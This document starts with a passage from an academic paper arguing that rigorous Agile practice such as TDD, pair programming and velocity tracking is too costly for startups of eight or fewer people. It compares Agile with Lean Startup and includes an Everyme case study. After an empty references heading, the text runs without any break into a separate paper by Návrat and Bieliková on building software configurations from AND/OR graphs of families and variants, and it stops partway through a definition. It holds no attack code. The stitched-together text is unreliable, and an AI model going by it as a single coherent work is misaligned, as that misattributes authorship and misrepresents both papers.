When that happens, it does not seem reasonable to write out all the tests; instead it would be preferable to implement those prototypes as fast as possible in order to speed up the design and decision process. Lastly, a small scale startup that has not obtained much funding will probably have a short runway, and thus a limited amount of time and money. The priority in this case will be to create an MVP, or minimum viable product, which may be lacking in quality but is at least functional enough to pitch to and show investors. Overall, the test-driven development aspect of Agile is a tradeoff of cost and time for improved software quality. Although quality is important, as startups usually only have a few chances to make a strong impression on investors and users in the market, cost and time may be a larger deciding factor. Once the startup runs out of funding, or if a close competitor releases a similar product, a higher-quality half of a product is not going to help much. The Extreme Programming process also places emphasis on pair programming, a practice that requires two developers to write code together on the same machine. This is often used with the purpose of creating better-written code, increasing discipline and emphasizing collective code ownership [13]. The idea is that paired programmers are less likely to take longer breaks and are more likely to “do the right thing” under someone else’s watch. Pair programming can also allow the programmers to bounce ideas off each other and thus be less likely to overthink a simple problem or to reach a programmer’s block. It also encourages collective code ownership by increasing a programmer’s knowledge of the code base through pairing with different programmers. The benefits listed above can again increase the quality of the software at the cost of money and time.
In addition, pair programming usually provides a good morale boost within the team and is often used in large companies due to the benefits it provides to the project management of large teams. However, for a small scale startup with fewer than eight employees, the benefits of pair programming may be limited. As discussed earlier, small startups have a tight constraint of time and money, and thus improving quality at twice the cost (of hiring two developers) may be out of scope for a small startup. Furthermore, since the team is very small, each developer is probably responsible for writing code in different areas of the code base, and thus already reaps the benefits of collective code ownership advertised by pair programming. A common system for assessing progress and defining features in Agile methods such as Scrum and Extreme Programming is the use of user stories, velocity and backlogs [19]. A user story is a description of a feature in everyday language that can be easily understood by non-technical persons. For example, a user story can be “As a user, I want to be able to log into the site with my Facebook account”. Each user story can then be assigned points based on the time it takes for the feature to be implemented, as estimated by the developer. The velocity of the team can be calculated as “the sum of the time estimated of user stories implemented within an iteration/release” [11], in other words, the sum of the points given to the user stories. By describing features in a non-technical language, the system encourages the integration of business and marketing into the implementation of the product, which can improve the usability of the software. The use of velocity to measure the team’s progress can also provide a quantitative assessment to the project manager and can help estimate the features that can be delivered before a certain deadline.
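The user-story and velocity bookkeeping described above is simple enough to sketch in a few lines. The following is an illustrative sketch only; the `UserStory` class, the story texts and the point values are invented for this example and are not taken from any tool mentioned in the paper.

```python
from dataclasses import dataclass

@dataclass
class UserStory:
    description: str   # everyday-language feature description
    points: int        # developer's effort estimate for the story
    done: bool = False # completed within this iteration?

def velocity(stories):
    """Velocity: the sum of the estimates of stories completed in an iteration."""
    return sum(s.points for s in stories if s.done)

# Hypothetical iteration backlog:
backlog = [
    UserStory("As a user, I want to log into the site with my Facebook account", 3, done=True),
    UserStory("As a user, I want to reset my password by email", 2, done=True),
    UserStory("As a user, I want to export my data", 5, done=False),
]

print(velocity(backlog))  # prints 5: only the two completed stories count
```

A project manager could track this number per iteration and use its running average to estimate how many story points fit before a deadline.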
Other than velocity, there are other metrics that are used to assess a team’s performance, such as defect rates, defined as the number of defects introduced by a team and by each programmer during each iteration. However, are these metrics that important to a small scale startup? From the above discussion, we can definitely note the importance of the Agile process and methodologies in software development. As a good “tool for project management”, it proves beneficial in improving quality and decreasing the time and cost of a project while keeping it in scope and focused in projects with a large team. The Agile methodology is a well-established system that can also act as a guide and provide a good structure for startups that do not have a clear plan for managing their team and analyzing their progress. However, we remain skeptical of whether small scale startups can actually reap the full benefits of following a rigorous Agile process. Agile may be popular in the startup world, but startups that are in a much earlier stage, with far fewer employees, are beginning to favor a relatively new process model called Lean Startup. Perhaps this new way of project management is more lightweight and better suited to the bootstrapping style of these early small scale startups.

VII. LEAN STARTUP

Lean Startup, a term coined by Eric Ries [21], is a process model that “builds on many previous management and product development ideas, including lean manufacturing, design thinking, customer development, and agile development”. Although the Lean Startup process does involve some core principles of the Agile methodologies discussed earlier, the main difference between Lean Startup and Agile is that Lean eliminates anything that is not absolutely necessary, possibly including team meetings, tasks and documentation. It is important to note that Agile and Lean are not mutually exclusive, but rather largely complementary.
In “The Lean Startup” [21], Ries emphasizes the importance of learning in the process. Lean Startup focuses on learning how to build a sustainable business, whether to pivot or preserve, and entrepreneurial management. According to Ries, it is important to distinguish whether the outcome of a startup’s effort is value-creating or wasteful. For example, since customer specifications change all the time, learning to gain important insights about customers contains much more value in the long run than focusing on making the product better by adding features and fixing bugs based on what the customers want at the time. Ries argues that although Agile development methodologies were designed to eliminate waste by decreasing the duration of feedback loops, a lot of waste still occurs because of mistaken assumptions. Agile as well as the “Lean thinking” in lean manufacturing defines value as effort that “[provides] benefit to the customer” [21]. However, who the customer is, what the customer wants and what the customer may find valuable are unknown and subject to change. Therefore Ries proposes that the value of a startup should arise from the effort spent on learning about “what creates value for customers”. The majority of Agile methodologies include techniques to aid in project management and progress analysis, such as the use of user stories, backlog and velocity, and also on finding the most efficient way to build features and make corrections that satisfy the customer’s current decisions. On the other hand, Lean Startup focuses on validated learning as the metric in measuring progress and value. For example, the Agile methodologies employ acceptance testing, tests that are based on customer specifications, as the testing strategy while Lean Startup advertises the use of split testing (an experimental approach that tests two variations of the software). 
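Split testing as described above needs each user to be consistently assigned to one of the two variations so that their behavior can be compared. The following is a minimal sketch of one common way to do that, deterministic bucketing by hash; the function and experiment names are hypothetical and not drawn from any tool the paper discusses.

```python
import hashlib

def assign_variant(user_id: str, experiment: str, variants=("A", "B")) -> str:
    """Deterministically bucket a user into one variant of an experiment.

    Hashing the (experiment, user_id) pair means a given user always
    sees the same variant, and different experiments bucket independently.
    """
    digest = hashlib.sha256(f"{experiment}:{user_id}".encode()).hexdigest()
    bucket = int(digest, 16) % len(variants)
    return variants[bucket]

# The same user always lands in the same bucket for a given experiment:
first = assign_variant("user-42", "signup-flow")
second = assign_variant("user-42", "signup-flow")
assert first == second
```

The startup would then compare a metric (sign-ups, retention, downloads) between the "A" and "B" populations to learn which variation creates more value for customers.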
The Lean Startup methodology holds that a startup only assumes who its customer is, but does not know exactly what the customer wants or what its final product should be. By using validated learning methods such as split testing, the startup is able to learn more about the customer and to make decisions, learn and improve its product in a way that is meaningful. Similarly, the release log and backlogs in Agile build toward a release plan, while Lean Startup works towards deploying a minimum viable product. It is this continuous deployment and validation that provide startups with knowledge of their market and customers. Although focusing on building a minimum viable product may sacrifice the quality of software in the short term, the startup benefits from the decrease in overall development time and cost. Through continuous deployment and validation, startups are able to push out products very quickly and continue to improve their quality in the longer run. Furthermore, the scope and quality of their software ultimately benefit in the long run due to the focus on learning and customers. Ultimately, Agile methodologies tend to target the actual development of software, while Lean Startup is more beneficial to business development and product management. In a small scale startup, perhaps the benefits gained by improving business and product development are more important in the long run than improving the actual process used to develop the software behind it. In the next section, we will take a look at a typical small scale startup that has employed a mix of both Agile and Lean process models, to observe both process models in practice.

VIII. CASE STUDY: EVERYME

In the Summer of 2012, the first author had the opportunity to intern at Everyme, a Y-Combinator startup that was building a private social network app for friends, families and partners.
At the time of employment, they had a team of five, which falls under our definition of a small scale startup. The team consisted of a designer, an iPhone developer, an Android developer and a web developer (who was also a co-founder); the CEO also worked on iOS development from time to time. This is a typical setup of a small tech startup, with teams of one or two people working on each part. At the time of the internship, Everyme was using a process model containing elements of both Lean Startup and Agile. The CTO of the company, Vibhu Norby [16], had also described the effects of their process model at the management level during an interview. From a developer’s perspective, the model was fairly simple. Since everyone was basically “in their own department”, they worked at their own pace and prioritized work in their own way. Occasionally, integration across the mobile and web platforms was needed and tasks had to be reprioritized. There was a five minute stand-up meeting once every few days to go over what each person had done previously, what he would do next and whether he would need anything from anyone. For example, an Android developer might ask the designer for templates. This provided everyone with a rough idea of the company’s progress and whether they had to re-prioritize their lists of tasks. This is similar to the daily stand-up meeting of the Agile process Scrum, but more casual and without producing a list of tasks required to be completed within the week (or sprint). Everyme did not employ a backlog system but instead had an issue list for people to assign tasks to each other. This gave each developer the flexibility to work on something he was interested in and provided the developers with more room for innovative implementations and features that may not necessarily be in a backlog. This is very similar to the Lean Startup ideology. However, Norby argued that this process did bring some disadvantages.
Without an Agile-style backlog or a required list of tasks to be completed by a certain time, there were times when the developers were unclear about what to do. When a major decision or possible pivot was being discussed and formed, which happened more often in a small startup than in a large company, the direction of the project became unclear, and time and money were wasted as developers were unsure of what they needed to do. Everyme also used a Lean Startup approach when it came to assessing the progress of the team and company. Instead of using the difficulty and number of features completed per week, similar to velocity in Agile, Everyme used a validated approach based on the number of downloads, the reviews and feedback they received, and so on. Milestones and inflection points were also used to observe the general progress of the company. Setting up inflection points, such as a release date, or important dates, such as meetings with investors that required the product to be done, was found to be much more effective as a motivational tool. People performed better under constraints. However, Lean Startup’s validated approach may only be beneficial up to a certain point. Norby noted that “progress measured by downloads, as done in Lean, may not be effective in the long run. You can have up to millions of downloads, but that doesn’t tell you which direction to go next.” When asked whether they had tried adopting a more rigorous Agile methodology, Norby described that they had tried using Sprint.ly [23], an online system that uses the Scrum process. Similar to Scrum, it defines tasks as user stories with a certain difficulty. These tasks are then stored in the backlog and taken out when a developer decides to implement them. However, integrating Sprint.ly into their existing process model was too costly and time consuming. For a small scale startup like Everyme, everyone has his own process model and work schedule.
Employees have their to-do lists in their heads and all know roughly how long each task will take. Spending time writing them down, modifying them and crossing them off later is simply unnecessary. Norby went on to describe how they had tried test-driven development, another important aspect of the Agile process, but found that it was also too time consuming. “We would spend a lot of time writing test cases for features that may end up not being implemented, because you know, specifications change all the time.” For small scale tech startups similar to Everyme, we can see that although the Agile principles are important, they may be too costly to implement. “We don’t even have a project manager... it takes too much effort for us to take time out of our schedule to manage this”. With a small enough team that functions well without management, it may seem unnecessary to insist upon a strict process model. Therefore, a combination of the Lean Startup approach and Agile principles may mitigate the problem by imposing less of a structured process while still providing the benefits that Agile proposes. IX. RELATED WORK There has been much research in the past that considered the suitability of Agile processes for various software organizations, but this prior work does not consider the challenges of small scale startups in particular [1][20] and/or does not address the impact of the process on the metrics of cost, scope, time, and quality [5][22], as we do here. Others have assessed various aspects of Agile software development (e.g., pair programming [15] or test-driven development [4]) but have not related the overall effect in a small startup environment.
Additionally, some researchers have investigated combinations of Lean Startup and Agile [25], and the tradeoffs between Agile and traditional approaches [18], while others have compared the two when used in a startup [10], but we believe that we are the first to specifically address the issues of Agile processes in a small scale startup company of eight or fewer employees. X. CONCLUSION We have discussed process models such as the Waterfall model, the Agile methodologies (Extreme Programming and Scrum), and Lean Startup, and their effects on small scale tech startups. We also looked at the effects of these process models on a startup in practice. Through our discussion, we concluded that different process models make different tradeoffs among the four metrics (cost, time, quality and scope) and are most beneficial when employed during different stages of a company. While the Waterfall model is effective for companies with a solid, unchanging end goal, it performs badly for startups that are unsure of their final products. The model can help companies decrease the cost and time of development by defining the specifications and design architectures at the beginning, but suffers when specifications change drastically. This may be beneficial to large companies with unchanging goals, but becomes ineffective for startups, which are likely to be unsure of their end goals and may change their specifications constantly. The Agile methodologies attempt to solve this issue by shortening the feedback loops and integrating customer feedback into the development process. Tasks are translated into user stories, a format understood by business people, in order to aid communication between business and development. Unlike in the Waterfall model, customer feedback can be easily integrated into the development process and the startup is able to make changes easily with minimal waste of time and money.
A rigorous, purely Agile process model can no doubt increase the quality of the software, but at the cost of extra time and money required to manage and maintain the process. At a hundred-person startup or even a large established company, the cost of maintaining such a process is fixed and spread out, making the tradeoff of quality against time and cost worth the implementation of an Agile process model. On the other hand, the fixed cost and time of implementing a similar process in a small scale startup may be too high for the quality gained. The Lean Startup model largely complements the Agile methodologies but argues that the Agile use of velocity, the difficulty and number of features implemented in each iteration, is a poor indicator of progress, and suggests the use of validated learning to determine the progress of a company. The Lean Startup methodology observes the excessive amount of process in the Agile model and attempts to mitigate the problem by decreasing the number of rigorous practices in a startup, striking a balance between quality, time and cost that is suitable for a small scale startup. At Everyme, a small scale startup, we saw that although the Agile methodology does provide a good process for managing teams of large sizes, a small scale startup may not experience the same problems as a large company and thus may not reap the full benefits of adopting an Agile methodology. While it is important to understand the Agile principles so the team does not fall into the trap of premature optimization and planning similar to the Waterfall process, a rigorous process may be too costly for a startup. Many Agile practices, such as test-driven development and pair programming, provide increased quality of software at the expense of cost and time. Furthermore, a heavy process model may in fact limit the scope of the project by discouraging innovation through a strict backlog or to-do list.
Thus, when considering whether a rigorous Agile methodology is the best development strategy for a startup, we have to consider the different tradeoffs of cost, time, quality and scope. For a small scale startup with fewer than eight members, a rigorous, purely Agile methodology may not provide enough benefits to outweigh the cost and time put into implementing and managing the process model. It is certainly important to understand Agile principles, but following the Agile methodology strictly is perhaps out of scope for a small startup. Thus, to answer the question, “Is a rigorous agile methodology the best development strategy for small scale tech startups?”, we have to determine the ultimate goal of the startup. In general, the Agile process model is most beneficial for improving the process of software development, while Lean Startup is most beneficial for business and product development. A startup that is developing software for another company may already have a clearly defined product and does not have to worry about business development. In such a case, a rigorous, purely Agile approach will be most beneficial. On the other hand, if the startup is in charge of business and product development, or when the software plays a huge part in the product, a hybrid of Agile and Lean may provide the most benefits in terms of the four metrics. Ultimately, a process model should be transparent enough to let the team know how the company is doing, but at the same time not burden the developers, allowing them to concentrate on what they do best. In a startup, the developers tend to be so invested and interested in the product that they do not require a strict to-do list or motivational benefits from the Agile methods. A possible area for future research is the analysis of the effects of process models on mobile-centric startups.
Practices such as continuous integration in Agile or continuous deployment in Lean Startup become nearly impossible in a startup with a heavy focus on mobile development. Since iOS apps have to be approved by Apple, the deployment process usually takes around a week. Even then, a startup cannot force its customers to upgrade to the newer version straight away, unlike with web applications. Thus, the process models that rely heavily on the ability to integrate and deploy continuously, or on split testing, may not be effective for mobile-centric startups. In this new era in which mobile development is becoming more and more popular, perhaps a new process model is required. ACKNOWLEDGMENT The authors would like to thank Kristin Fergis for her initial investigation into this topic, and Vibhu Norby for providing insight into Everyme’s organization and processes. REFERENCES
AN APPROACH TO AUTOMATED BUILDING OF SOFTWARE SYSTEM CONFIGURATIONS PAVOL NÁVRAT and MÁRIA BIELIKOVÁ Slovak Technical University, Dept. of Computer Science and Engineering, Ilkovičova 3, 812 19 Bratislava, Slovakia E-mail: {navrat,bielikova}@elf.stuba.sk Tel.: (+ 42 7) 791 395 Fax: (+ 42 7) 720 415 Abstract In the paper, we concentrate on a method for building a software configuration. We build configurations by defining the system’s model first. We have introduced a model of a software system as an AND/OR-type graph with two kinds of nodes: families and variants. Models serve as useful abstractions simplifying the process of configuration building. Since building is essentially a graph search, a method for selecting a proper version is indispensable. Our approach offers a software engineer a framework for specifying various heuristics describing which versions are to be preferred. In our method, the search is further reduced by introducing the concepts of generic and bound configurations and by dividing the fundamental steps of our method. Keywords: Software configuration management, version control, selection controlled by heuristics. 1 Introduction One of the important problems in software development and management is how to build configurations of software systems. The problem is a consequence of the fact that software is complex both as a product and as a process of its development. Software is built as a system consisting of many components which are naturally simpler than the whole, reducing the complexity in that way. The process of development is also gradual, involving many more elementary, and therefore simpler, steps. In those steps, very often only one particular component is transformed into a modified one, still implementing essentially the same concept. Such transformations of components give rise to their versions.
Consequently, we have a huge space of possible software system configurations viewed as sets of components satisfying requirements. The requirements can vary considerably, e.g. we can require a configuration intended as a product to be delivered to a customer, or a configuration intended as a document to resume development with. The process of building a software system configuration is itself a complex one. Bookkeeping of attributes and relations of thousands of objects alone, not to speak of the frequency of their changes is a task which can best be handled by a computer. A support from a computer should further be sought in freeing the software engineer from the burden of a too detailed configuration specification. Instead, software engineer should have means to write higher level requirements which specify the configuration implicitly. Ultimately, this leads to employing relevant knowledge which would be represented explicitly and used by the computer. This can be considered an approach to automating the above mentioned part of the software engineering. Any progress in automating the software engineering is hard to imagine without further formalisation in describing the objects and processes, and indeed there is much research endeavour oriented towards this aim, cf. e.g. [9]. More specifically, there have been various efforts to automate support to building software configuration. However, some of them do not take into account the existence of versions, e.g. [7, 27], or if they do, they neglect the difference between variants and revisions, e.g. [24, 18]. Some, on the other hand, make use of the difference between variants and revisions to increase efficiency of the building process, especially in version selection, e.g. [11, 13, 5, 12, 19, 26, 23]. An interesting view on the space of versions with revisions and variants evolving along orthogonal dimensions is presented in [21, 29]. 
An important aspect is reusability of the created configuration, as well as of its description and of the model of the software system, as has been pointed out by, e.g., [1] in developing a system called ADELE, cf. [6]. That work also influenced our approach to the problem. The outline of the rest of the paper is as follows. We present our approach to modelling software systems in section 2. We stress our interpretation of the notion of variant and give a formal description of the model. We briefly comment on differences between our work and related works. In section 3, we describe the way we specify a configuration. Again, we briefly comment on the points which are new in our approach compared to related works. The proposed method for building a configuration is presented in section 4. Next, we report on experimental evaluation of our method, including a description of the tests performed, in section 5. Section 6 summarizes the points in our approach that are new when compared to related works and draws conclusions for future work. 2 Modelling a Software System Solving various problems related to building software system configurations in processes of software development and maintenance requires describing the actual software system in the simplest possible way, but still sufficiently richly to reflect the principal relations and properties which are decisive in the building process. Generally, various kinds of graphs are used to model software systems. A quite natural way to represent software systems is by means of a tree [22]. It does not, however, allow describing the more complex aspects of such systems. An acyclic oriented graph is the next more suitable choice [27, 8]. Tichy [24] and later Estublier [6] have presented a model based on AND/OR graphs. An important aspect stressed also by the latter work is reusability of the created configuration. We attempt to describe a software system with a specific purpose in mind, i.e.
to be used during development and maintenance, and specifically in building the software system configuration. Therefore, our model encompasses those parts of the system and those relations among them which are important for building a configuration. We find AND/OR graphs suitable for supporting the process of software system configuration building [3]. When attempting to identify the basic parts of the system model, it is instructive to bear in mind that a software system is created in a development process which can be viewed as a sequence of transformations. Because the initial specification of the system does not and should not include details of the solution, the overall orientation of the transformations is from abstract towards concrete. However, this does not mean that each particular transformation, especially when applied to a particular subsystem or component, is a concretization. In fact, abstracting, generalizing, and specializing transformations are involved as well. Let us mention the importance of such kinds of transformations in software reuse, reverse engineering, etc. From among all the possible kinds of transformations, it is important to distinguish those which correspond to the notion of software component version. Creating a software component version can be done in one of two possible ways. First, versions are created to represent alternative solutions of the same specification. They differ in some attributes. Such ‘parallel’ versions, or variants, are frequently the result of different specializations. Second, versions are created to represent improvements of previous ones, or modifications caused by error correction, functionality enhancement, and/or adaptation to changes in the environment. Such ‘serial’ versions, or revisions, are frequently the result of concretizations of the same variant. A family of software components comprises all components which are versions of one another.
When defining a model of a software system, relations between software components should be considered. They can be of two kinds:
- relations expressing the system’s architecture, concerned especially with the functionality of the components and the structure of the system, such as depends_on, specifies, uses,
- relations expressing certain aspects of the system’s development process, with important consequences especially for version management, such as is_variant, has_revision, which we shall commonly refer to as development-induced relations.
Let us formulate the notions more formally now. Let $COMPONENT_S$ be a set of components of a software system $S$. Then a binary relation $is\_version_S \subseteq COMPONENT_S \times COMPONENT_S$ is given as the reflexive, symmetric and transitive closure of another binary relation which is defined by elementary transformations describing such modifications of software components that they can still be considered to express essentially the same concept. The relation $is\_version_S$ is reflexive, symmetric and transitive. The set of all equivalence classes induced by the $is\_version_S$ relation is denoted $FAMILY_S$ and called the set of families of software components of the software system $S$. An element of $FAMILY_S$ is called a family of software components. Next, we focus our attention on the structure of a software component itself. We define which kinds of properties a component has. Based on that, we can define variants as sets of those components which share certain attributes. We call a software component a quintuple $c_S$: $$c_S = (ArchRel, FunAttr, CompAttr, Constr, Real),$$ where $ArchRel$ is a set of pairs consisting of a name $RelationId$ of an architectural relation and a name $FamilyId$ of a family (it represents relations expressing the system’s architecture), $FunAttr$ is a set of functional attributes (name together with value), $CompAttr$ is a set of other attributes of that component (i.e.
the attributes that vary between revisions), $Constr$ is an expression for a constraint (in the sense of combining components into configurations), and $Real$ is the actual text of the component. For example, consider a software component c1, for which there exists an architectural relation contains with a family of software components INIT, and a relation has_document with a family DOCUM:

c1 = ( {(contains, INIT), (has_document, DOCUM)},              -- architectural relations
       {(phase, implementation), (operating_system, DOS),
        (prog_language, C), (user_interface, graphic),
        (type_of_problem, diagnose)},                          -- functional attributes
       {(author, peter), (date, 95_01_15), (status, tested)},  -- other attributes
       (parameters = ordered) => (system_ver = DOS_6_2),       -- constraint
       "#define ..." )                                         -- realisation (C language text)

In order to describe variants, we define a binary relation is_variant which determines a set of software components with the same architectural relations, functional attributes and constraints within a given family. The binary relation $is\_variant_S \subseteq COMPONENT_S \times COMPONENT_S$ is defined by: $$x \; is\_variant_S \; y \iff x \; is\_version_S \; y \land x.ArchRel = y.ArchRel \land x.FunAttr = y.FunAttr \land x.Constr = y.Constr$$ It can easily be seen that the relation is_variant is an equivalence. The set of all equivalence classes of the relation is_variant will be denoted by $VARIANT_S$ and called the set of variants of a software system $S$. An element of the set $VARIANT_S$ is called a variant.
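The component quintuple and the is_variant relation can be rendered as a small Python sketch. The class and field names mirror the paper's terminology; the concrete attribute values follow the c1 example, while c2 and its revision-level attributes are our own illustrative additions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Component:
    """A software component as the quintuple (ArchRel, FunAttr, CompAttr, Constr, Real)."""
    arch_rel: frozenset   # {(relation_name, family_name), ...}
    fun_attr: frozenset   # {(attribute_name, value), ...}
    comp_attr: dict       # revision-level attributes (author, date, status, ...)
    constr: str           # constraint expression
    real: str             # actual text of the component

def is_variant(x: Component, y: Component) -> bool:
    """Same architectural relations, functional attributes and constraint."""
    return (x.arch_rel == y.arch_rel
            and x.fun_attr == y.fun_attr
            and x.constr == y.constr)

c1 = Component(
    arch_rel=frozenset({("contains", "INIT"), ("has_document", "DOCUM")}),
    fun_attr=frozenset({("phase", "implementation"), ("operating_system", "DOS"),
                        ("prog_language", "C"), ("user_interface", "graphic"),
                        ("type_of_problem", "diagnose")}),
    comp_attr={"author": "peter", "date": "95_01_15", "status": "tested"},
    constr="(parameters = ordered) => (system_ver = DOS_6_2)",
    real="#define ...",
)
# A later revision of the same variant: only the revision-level attributes differ.
c2 = Component(c1.arch_rel, c1.fun_attr,
               {"author": "peter", "date": "95_02_01", "status": "draft"},
               c1.constr, "#define ... /* revised */")
```

Since c1 and c2 agree on arch_rel, fun_attr and constr, `is_variant(c1, c2)` holds, i.e. they are two revisions within one variant.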
Variants are important to simplify management of software component versions in selecting a revision of some component, or in building a configuration. We can treat a whole group of components in a uniform way due to the fact that all of them have the relevant properties defined as equal. As an example, let us present a part of software system which includes versions of (some of) its components. The example is taken from the software system KEX [17]. The system elements are shown in Figure 1 along with architectural relations between them. In Figure 1, the elements are organized in a hierarchy. Families of software components comprise variants and variants comprise revisions. Architectural relations are defined at the level of variants (they are the same for all revisions within a variant) between a variant and a family of software components. They are identified by names: EVAL, INIT, ACTIONS, INFER, DOCUM, INTERR, MANAGER. Each family includes several software components, e.g. the family EVAL includes three sets of components (i.e. variants) which include in turn nine revisions. Thus, the family EVAL includes nine software components. The concepts introduced above will allow us to formulate a model of a software system which would support a process of configuration building. Our approach is based on an assumption that families of software components, variants and revisions are the basic entities involved in version management. All the relations between these entities can be grouped into architectural relations and development-induced relations. Development-induced relations determine membership of a variant in a family of components, and membership of a revision in a variant. Architectural relations express the system’s architecture, especially the functionality of the components and the structure of the system. They must be defined explicitly at the level of variants and must be the same for all revisions included in a given variant. 
Particularly this assumption is very important, because it allows us to simplify the situation and to formulate a model of a software system which comprises only two kinds of elements: families and variants. From the point of view of a family, a model should represent families and the variants included in them. Links from a family to all its variants are defined by the relation $has\_variant_S \subseteq FAMILY_S \times VARIANT_S$: $x \; has\_variant_S \; y \iff y \subseteq x$. From the point of view of a variant, the model should represent links to all those families which are referred to in that variant (links are defined by architectural relations). When building a configuration, for each family already included in the configuration precisely one variant must be selected. For each variant already included in the configuration, all the families related by architectural relations to that variant must be included. Taking into account that a software component is determined completely only after a revision has been selected, a resulting configuration is built by selecting precisely one revision for each selected variant. Our method of modelling a software system $S$ is to describe it by an oriented graph $M_S = (N, E)$, with nodes representing families and variants in such a way that these two kinds of nodes alternate on every path. Any element of $E$, $(e_1, e_2) \in E$, called an edge, is of one of two mutually exclusive kinds. Either $e_1 \in VARIANT_S$ (the set of variants of a software system $S$) and $e_2 \in F_S$ (the set of family names of a software system $S$); in this case, the node $e_1$ (variant) is called an $A$-node. Or $e_1 \in F_S$ and $e_2 \in VARIANT_S$; in this case, the node $e_1$ (family) is called an $O$-node. Such graphs are denoted as $A/O$ graphs. Revisions are covered in the model through $A$-nodes, which represent variants, i.e. sets of revisions.
The usual interpretation is that $A$-nodes are origins of edges leading to nodes, all of which must be considered provided the $A$-node is under consideration (logical AND). Similarly, $O$-nodes are origins of edges leading to nodes, from among which exactly one must be considered provided the $O$-node is under consideration (logical OR). The example software system depicted in Figure 1 can be expressed by the $A/O$ graph in Figure 2. For simplicity, variants are given names derived from the name of the corresponding family of software components by suffixing it with a natural number. Figure 2: Model of the software system from Figure 1 represented as an $A/O$ graph. Let $FAMILY_S$ be a set of families of software components and $VARIANT_S$ a set of variants of a software system $S$. Let $F$ be a set of names and $f_{name}: FAMILY_S \to F$ an injective function which assigns a unique name to each family of a software system $S$. Let $A \subseteq VARIANT_S \times F$ be a binary relation defined as $$ e_1 \, A \, e_2 \iff \exists x \, \exists r \, (x \in e_1 \land r \in x.ArchRel \land r.FamilyId = e_2) $$ Let $O \subseteq F \times VARIANT_S$ be a binary relation defined as: $$ e_1 \, O \, e_2 \iff e_2 \subseteq f_{name}^{-1}(e_1). $$ We define a model of a software system $S$ to be an oriented graph $M_S = (N, E)$, where $N = F_S \cup VARIANT_S$ is a set of nodes with $F_S = \{\, x \mid x \in F \land f_{name}^{-1}(x) \in FAMILY_S \,\}$, and $E = A \cup O$ is a set of edges such that every maximal connected subgraph has at least one root. We remark that the binary relation $A$ represents architectural relations and the relation $O$ mirrors the has_variant relation. The requirement that a model of a software system should have at least one root is motivated by the fact that the model should serve the purpose of building a software system configuration.
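A minimal concrete representation of such an $A/O$ graph might look as follows. The dictionary encoding and the sanity check are our assumptions; the node names loosely follow the KEX example (family names suffixed with a number for variants), not the full system of Figure 1.

```python
# O-nodes (families) map to their variants; A-nodes (variants) map to the
# families their architectural relations point at. Every edge therefore goes
# family -> variant or variant -> family, so the two node kinds alternate.
model = {
    "families": {
        "KEX":  ["KEX1"],
        "EVAL": ["EVAL1", "EVAL2", "EVAL3"],
        "INIT": ["INIT1"],
    },
    "variants": {
        "KEX1": ["EVAL", "INIT"],   # A-node: ALL successor families required
        "EVAL1": [], "EVAL2": [], "EVAL3": [],
        "INIT1": [],
    },
}

def check_alternation(model):
    """Verify that edges only connect families to variants and vice versa."""
    fams, vars_ = model["families"], model["variants"]
    for f, succ in fams.items():
        assert all(v in vars_ for v in succ), f"O-node {f} must point at variants"
    for v, succ in vars_.items():
        assert all(f in fams for f in succ), f"A-node {v} must point at families"
    return True
```

The alternation check enforces exactly the structural property the definition requires: $A$-edges leave variants, $O$-edges leave families.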
When there is no root in a model, it is not possible to determine which components are to be selected for a configuration. Actually, the requirement is not a restriction in the case of software systems. This follows from the very nature of the development of a software system and its description by transformations of solution states. Let us mention that the known approaches to modelling a software system by a graph all assume there is at least one root, cf. [15, 20, 14, 6].

3 Specifying a configuration

Taking into account the fact that the nodes in our model are component families and variants, but not revisions (i.e., the actual software components), it follows that any configuration we build by searching the model can only be a generic one. It may identify several configurations of the software system. A configuration of a software system built solely from software components, i.e. revisions, is called a bound one. A generic configuration consists of variants and it determines a set of bound configurations [5]. To build a concrete (bound) configuration from a generic one, one revision must be selected for each variant in the generic configuration. Let $M = (N, E)$ be a model of a software system. We take a subgraph $G_M = (U, H)$ of $M$, where $U \subseteq N, H \subseteq E$, such that each $O$-node (i.e. family) has exactly one successor in it and $U$ includes at least one $O$-node (i.e. family) and at least one $A$-node (i.e. variant), and call it a generic configuration for $M$. We take a set of software components such that for each variant included in the generic configuration $G_M$ there is at most one revision (i.e., a software component) in it, and call it a bound configuration $B_{G_M}$. Requirements specifying a configuration determine which components are admissible for the configuration. Requirements specification is an important phase of the process of configuration building.
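The relation between the two notions just defined can be sketched as follows (the variant and revision names are hypothetical; the `choose` strategy standing in for revision selection is an assumption of this sketch):

```python
# A generic configuration fixes exactly one variant per selected family;
# binding it then picks one revision per selected variant.

generic = {"INFER": "INFER.2", "EVAL": "EVAL.3"}   # family -> chosen variant

revisions = {                                       # variant -> its revisions
    "INFER.2": ["INFER.2-r1", "INFER.2-r2"],
    "EVAL.3":  ["EVAL.3-r1"],
}

def bind(generic, revisions, choose=lambda revs: revs[-1]):
    """Build a bound configuration from a generic one; `choose` stands in
    for revision selection (here simply the latest revision)."""
    return {v: choose(revisions[v]) for v in generic.values()}
```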
The quality of the configuration largely depends on the requirements and on how they are actually used in the building process. Our approach to building the configuration is based on a model of a software system represented as an $A/O$ graph. The requirements influence the subgraph derived from the model, i.e. the generic configuration, as well as the selection of a revision for each variant, i.e. the forming of the bound configuration. The configuration requirements can be classified as:

- requirements related to properties of components viewed from the point of view of the whole system, i.e. which components (families of them) are to be considered when building the configuration,
- requirements on version selection.

The first group is specified by:

- a set of names of architectural relations (represented by edges originating in $A$-nodes), which will serve to integrate $A$-nodes of the system,
- a condition for the selection of exported components (represented for instance by a logic expression referring to component attributes).

The requirement for version selection is expressed as a sequence of heuristic functions which reduce the set of suitable versions. The heuristic functions represent knowledge about the degree of suitability of the respective versions. We adopted the widespread approach of identifying versions of components by the use of attributes [13, 5, 28]. The heuristic functions refer to properties of versions as defined by their attributes. We can express the relative importance of a given evaluating criterion by modifying the order in which the heuristic functions are applied. We have distributed the requirements for version selection into two parts:

- a necessary selection condition, which must be satisfied by every version selected as a potential candidate. The condition can be expressed by a heuristic function which maps the set of all versions into a set of admissible versions.
- a suitability selection condition, which is used in a step-by-step reduction of the set of admissible versions aiming to select a single version. The condition is represented by heuristic functions $h_1, h_2, \ldots, h_n$.

In order to build a configuration which would meet the requirements, our method builds a generic configuration first and then proceeds to build a bound one. We distributed the configuration requirements into two parts: the generic configuration requirement and the bound configuration requirement. We shall write the generic configuration requirement as a triple
$$\text{gcr}_M = (\text{Rel}, \text{VariantCond}, \text{ConfConstr})$$
